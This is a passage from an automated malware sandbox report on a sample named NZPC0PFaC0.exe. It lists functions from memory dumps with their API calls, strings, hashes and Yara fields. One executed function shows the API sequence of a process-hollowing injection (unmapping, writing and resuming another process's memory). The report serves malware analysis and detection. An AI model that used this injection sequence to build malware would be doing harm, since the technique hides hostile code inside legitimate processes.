                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free$ExitProcess___crt
                                                                                      • String ID: E~$E~$ProgramFiles=C:\Program Files\Common Files
                                                                                      • API String ID: 1022109855-3198583532
                                                                                      • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                      • Instruction ID: 85dc49bacd0cd5567c6a1f00bb21a90cfa81a77bea49efc2f74cc5d58a7fe5f4
                                                                                      • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                      • Instruction Fuzzy Hash: 9A31D4319023D0DBCB616F16FC8584977A4FB5A320354863AF9085B2B0CFB85DD8AF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 007D1960, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 149COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                      • String ID: ^u
                                                                                      • API String ID: 65388428-3277548187
                                                                                      • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                      • Instruction ID: 0e9e0c0ab0d92d5a66e5bd3351fe6c4cb2a9e2987fa3dae7c12611a1ecd56731
                                                                                      • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                      • Instruction Fuzzy Hash: F5515D71D40219FBDB10DBA5DD46FEFBBB8FB04744F104026FA05B6280E7786A018BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0080FC0C, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0080FC1F
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0080FC34
                                                                                      • std::exception::exception.LIBCMT ref: 0080FC4D
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0080FC62
                                                                                      • std::regex_error::regex_error.LIBCPMT ref: 0080FC74
                                                                                        • Part of subcall function 0080F914: std::exception::exception.LIBCMT ref: 0080F92E
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0080FC82
                                                                                      • std::exception::exception.LIBCMT ref: 0080FC9B
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0080FCB0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throwstd::exception::exception$std::regex_error::regex_error
                                                                                      • String ID: leM
                                                                                      • API String ID: 2862078307-2926266777
                                                                                      • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                      • Instruction ID: ea89c3e76758f19535afa87b92f9db44463cb11d97bfdb3196f9742cd57ccfa4
                                                                                      • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                      • Instruction Fuzzy Hash: 7A11BC79C0020DFBCF00FFA5D959CEDBB7CAA04344F808566BE1497641EB78A7488B95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 007CF010, Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free_malloc_wprintf$_sprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3721157643-0
                                                                                      • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                      • Instruction ID: b178d2f77c0d95c29a4a50ffdec394bb1fa4e7b2135067234135747f3ac67ac7
                                                                                      • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                      • Instruction Fuzzy Hash: EC1127B2501694AAC26162B60C17FFF3BDC9F4A701F440079FA8CE1182DA1C5A0593B2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 007CF210, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 165COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$_memset_sprintf
                                                                                      • String ID: ^u
                                                                                      • API String ID: 217217746-3277548187
                                                                                      • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                      • Instruction ID: 8f7e11f6271d35c6fbfd157cfd9df88b7806d8668f0f09ba4d04587f68b445ae
                                                                                      • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                      • Instruction Fuzzy Hash: 69515EB1D40249FBDF11DFA1DC46FEEBB79BB04704F10402AF905B6281E779AA058BA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 007CF440, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$_memset_sprintf
                                                                                      • String ID: ^u
                                                                                      • API String ID: 217217746-3277548187
                                                                                      • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                      • Instruction ID: f38da62896a2ef543d487d861a8ad112a2e69214d0deb52fffb856a83834f8d1
                                                                                      • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                      • Instruction Fuzzy Hash: 12514171D40249EADF11DFA1DD46FEEBBB9EB08744F100139FA05B6281E6786A058BA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 008866D9, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __getptd_noexit.LIBCMT ref: 008866DD
                                                                                        • Part of subcall function 007E59BF: __calloc_crt.LIBCMT ref: 007E59E2
                                                                                        • Part of subcall function 007E59BF: __initptd.LIBCMT ref: 007E5A04
                                                                                      • __calloc_crt.LIBCMT ref: 00886700
                                                                                      • __get_sys_err_msg.LIBCMT ref: 0088671E
                                                                                      • __invoke_watson.LIBCMT ref: 0088673B
                                                                                      • __get_sys_err_msg.LIBCMT ref: 0088676D
                                                                                      • __invoke_watson.LIBCMT ref: 0088678B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                                                                      • String ID: -716T771$R_REVISION=5507
                                                                                      • API String ID: 4066021419-1087220190
                                                                                      • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                      • Instruction ID: 75bee004cc5b2263cfe8e133f1d60edae937d4d38bf2684a7469647c92d6a305
                                                                                      • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                      • Instruction Fuzzy Hash: 9A11EB31602659ABEB22762ADC06ABB738CFF14768F100566FE04D7242F725DD1043E5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 007E2AD0, Relevance: 7.7, APIs: 5, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                      • String ID:
                                                                                      • API String ID: 1559183368-0
                                                                                      • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                      • Instruction ID: ffdb418fc2ce45429b7bc37afdbd9faa0fed582eeca85e2f3323d5f3ad8fe4ae
                                                                                      • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                      • Instruction Fuzzy Hash: A351EE70A02385DBDB248F6BC88456E77B9BF48324F248329F835961D2E7789D52DB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 007D2670, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: D
                                                                                      • API String ID: 2102423945-2746444292
                                                                                      • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                      • Instruction ID: 39b55f63a07d6f406784f3b343806061d34550985676dd041c3d6fec758e9f8c
                                                                                      • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                      • Instruction Fuzzy Hash: 6AE15D71D00219EBCF24DBA0DD49FEEBBB8BF14304F14416AE509B6291EB786A46CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 007CD8B0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: $$$(
                                                                                      • API String ID: 2102423945-3551151888
                                                                                      • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                      • Instruction ID: a125747d57f5cba3d0de33763bccba305b67c3a8c364e6de1e4f25de1036977b
                                                                                      • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                      • Instruction Fuzzy Hash: 3C91AFB1D00258DAEF21CFA0CC5ABEEBBB4AF05304F24416DE40577281DBBA5E49CB65
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0080FBDE, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0080FBF1
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0080FC06
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throwstd::exception::exception
                                                                                      • String ID: TeM$TeM
                                                                                      • API String ID: 3728558374-3870166017
                                                                                      • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                      • Instruction ID: 383d34cacd518dcdbb535073706f9fb1512aab93afd9a1d43be7d4104b62ad93
                                                                                      • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                      • Instruction Fuzzy Hash: 7AD06775C0020CFBCB00EFA5D45ACDDBBB8AA04344F408466AA1497241EA78A7498B94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 007CD0E0, Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 007E197D: __wfsopen.LIBCMT ref: 007E1988
                                                                                      • _fgetws.LIBCMT ref: 007CD15C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __wfsopen_fgetws
                                                                                      • String ID:
                                                                                      • API String ID: 853134316-0
                                                                                      • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                      • Instruction ID: c0018e0b21e7aa5ef420cb9946d8570273a8f6528d3104d8538d68df90ffceb5
                                                                                      • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                      • Instruction Fuzzy Hash: 4B918D72D01259EBCF21DFA4C889BAEB7B5BF14304F14053DE815A3241E779AE14CBA6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 007CD540, Relevance: 6.2, APIs: 4, Instructions: 240COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _malloc$__except_handler4_fprintf
                                                                                      • String ID:
                                                                                      • API String ID: 1783060780-0
                                                                                      • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                      • Instruction ID: 16d8866657b80164aa9986ae680bcb5e186ae3d8f221decc23c3184ac71e54cd
                                                                                      • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                      • Instruction Fuzzy Hash: 9DA154B1C00248DBEF11EFD4CC4ABDEBB75AF14304F14402DE50576292E7BA5A99CBA6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00812040, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: -716T771$R_REVISION=5507
                                                                                      • API String ID: 0-1087220190
                                                                                      • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                      • Instruction ID: bfd48e734965576fc6845a401089d1534fc79087397250f00ac4ef40857f5270
                                                                                      • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                      • Instruction Fuzzy Hash: 4B118175F80B10B7F6213718AC87FD53449FB60B55F54042AF648AD2C3E7F654E4825A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 007EF92F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __umatherr.LIBCMT ref: 007EF960
                                                                                        • Part of subcall function 007EFCE3: __ctrlfp.LIBCMT ref: 007EFD42
                                                                                      • __ctrlfp.LIBCMT ref: 007EF983
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __ctrlfp$__umatherr
                                                                                      • String ID: [:~
                                                                                      • API String ID: 219961500-230464001
                                                                                      • Opcode ID: 609237798d06c5ac2b4d2be0e5018503f9338edfc2fa56b33c37b0ec48d7a4eb
                                                                                      • Instruction ID: 6e40115c69b9de5feaab7740be20284bb73e6ed672d7d90b03697547ddf67acb
                                                                                      • Opcode Fuzzy Hash: 609237798d06c5ac2b4d2be0e5018503f9338edfc2fa56b33c37b0ec48d7a4eb
                                                                                      • Instruction Fuzzy Hash: ACF090B1904A0EFADB023F81E8467993FA0EF08350F204490F898145E2EB7694749B95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Analysis Process: NZPC0PFaC0.exe PID: 1376 Parent PID: 664 NZPC0PFaC0.exeCOMMON

                                                                                      Executed Functions

                                                                                      Function 00840110, Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00840156
                                                                                      • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0084016C
                                                                                      • CreateProcessA.KERNELBASE(?,00000000), ref: 00840255
                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00840270
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00840283
                                                                                      • GetThreadContext.KERNELBASE(00000000,?), ref: 0084029F
                                                                                      • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008402C8
                                                                                      • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 008402E3
                                                                                      • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00840304
                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0084032A
                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00840399
                                                                                      • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008403BF
                                                                                      • SetThreadContext.KERNELBASE(00000000,?), ref: 008403E1
                                                                                      • ResumeThread.KERNELBASE(00000000), ref: 008403ED
                                                                                      • ExitProcess.KERNEL32(00000000), ref: 00840412
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                      • String ID:
                                                                                      • API String ID: 2875986403-0
                                                                                      • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                      • Instruction ID: f5f8de249a752b23cefbed054c34972100b3b01ad2f9152e341a78e3a24bcf60
                                                                                      • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                      • Instruction Fuzzy Hash: 9DB1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E609AB391D771AE41CF94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00840630, Relevance: 58.4, APIs: 1, Strings: 32, Instructions: 671libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNELBASE(user32), ref: 008406E2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: CloseHandle$CreateFileA$CreateProcessA$CreateWindowExA$DefWindowProcA$ExitProcess$GetCommandLineA$GetFileAttributesA$GetMessageA$GetMessageExtraInfo$GetModuleFileNameA$GetStartupInfoA$GetThreadContext$MessageBoxA$NtUnmapViewOfSection$NtWriteVirtualMemory$PostMessageA$ReadProcessMemory$RegisterClassExA$ResumeThread$SetThreadContext$VirtualAlloc$VirtualAllocEx$VirtualFree$VirtualProtectEx$WaitForSingleObject$WinExec$WriteFile$WriteProcessMemory$kernel32$ntdll.dll$user32
                                                                                      • API String ID: 1029625771-3105132389
                                                                                      • Opcode ID: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
                                                                                      • Instruction ID: 0212bf60b5300e84f5dc61bcab4a023a4be99f6a185c8f90d2499f9673fa9875
                                                                                      • Opcode Fuzzy Hash: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
                                                                                      • Instruction Fuzzy Hash: 68A25460D0C6E8C9EB21C668CC4C7DDBEB51B26749F0841D9818C66292C7BB1B98CF76
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00840420, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00840533
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                      • API String ID: 716092398-2341455598
                                                                                      • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                      • Instruction ID: 95aadb861234f5c93da3ae3891cbba4ad94096095da4063eb71f5f46e9fea03a
                                                                                      • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                      • Instruction Fuzzy Hash: DB511870D0838CDAEB11CBE8C849BDEBFB2AF15708F144058D5447F286C3BA5A58CB66
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 008405B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNELBASE(apfHQ), ref: 008405EC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID: apfHQ$o
                                                                                      • API String ID: 3188754299-2999369273
                                                                                      • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                      • Instruction ID: 960d3b2adbcd2fc861a1b3a4fba5e72a4b194e7621fa6257f60437c1381a9697
                                                                                      • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                      • Instruction Fuzzy Hash: 2C011A70C0424CEADB10DBE8C5183AEBFB5EF51309F148099C5496B242D7B69B98CBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 00851960, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 149COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                      • String ID: ^u
                                                                                      • API String ID: 65388428-3277548187
                                                                                      • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                      • Instruction ID: a116ad4e80f652eaacba670b24988de1a284e6d7724a0721b1b57481c0645cd3
                                                                                      • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                      • Instruction Fuzzy Hash: A9515A71D40219ABDF11DBA5DC8AFEFBBB8FB04B45F100025F905F6181E774AA058BA6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00863F16, Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 00863F51
                                                                                        • Part of subcall function 00865BA8: __getptd_noexit.LIBCMT ref: 00865BA8
                                                                                      • __gmtime64_s.LIBCMT ref: 00863FEA
                                                                                      • __gmtime64_s.LIBCMT ref: 00864020
                                                                                      • __gmtime64_s.LIBCMT ref: 0086403D
                                                                                      • __allrem.LIBCMT ref: 00864093
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008640AF
                                                                                      • __allrem.LIBCMT ref: 008640C6
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008640E4
                                                                                      • __allrem.LIBCMT ref: 008640FB
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00864119
                                                                                      • __invoke_watson.LIBCMT ref: 0086418A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                      • String ID:
                                                                                      • API String ID: 384356119-0
                                                                                      • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                      • Instruction ID: c8f0d68c9134b25fad432afd37a9fed9016bdb7688d1ccb1124e84cc128cba20
                                                                                      • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                      • Instruction Fuzzy Hash: 8C71C672A00B16ABE7149E7DCC41B6EB3B9FF11364F158229F514E7682EB70DE408B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 008684AB, Relevance: 16.6, APIs: 11, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free$ExitProcess___crt
                                                                                      • String ID:
                                                                                      • API String ID: 1022109855-0
                                                                                      • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                      • Instruction ID: 7602314aee898abf9e92d21bdf67ce6e32cd6f313753b4a6e017384ab395464c
                                                                                      • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                      • Instruction Fuzzy Hash: CB318431900260DBCF616F58FC8D84977A4FB5432070A862AF91ADB2B1CFB45DC99F95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0088FC0C, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0088FC1F
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0088FC34
                                                                                      • std::exception::exception.LIBCMT ref: 0088FC4D
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0088FC62
                                                                                      • std::regex_error::regex_error.LIBCPMT ref: 0088FC74
                                                                                        • Part of subcall function 0088F914: std::exception::exception.LIBCMT ref: 0088F92E
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0088FC82
                                                                                      • std::exception::exception.LIBCMT ref: 0088FC9B
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0088FCB0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throwstd::exception::exception$std::regex_error::regex_error
                                                                                      • String ID: leM
                                                                                      • API String ID: 2862078307-2926266777
                                                                                      • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                      • Instruction ID: 72d2a0c9796463da3b5ac2e4e04cf277196311f2b76936a0db236e888b9207ff
                                                                                      • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                      • Instruction Fuzzy Hash: 78119979C0020DBBCF00FFA9D859CDDBB78FA14744B40C566B92897646EB74E3488B96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0084F010, Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
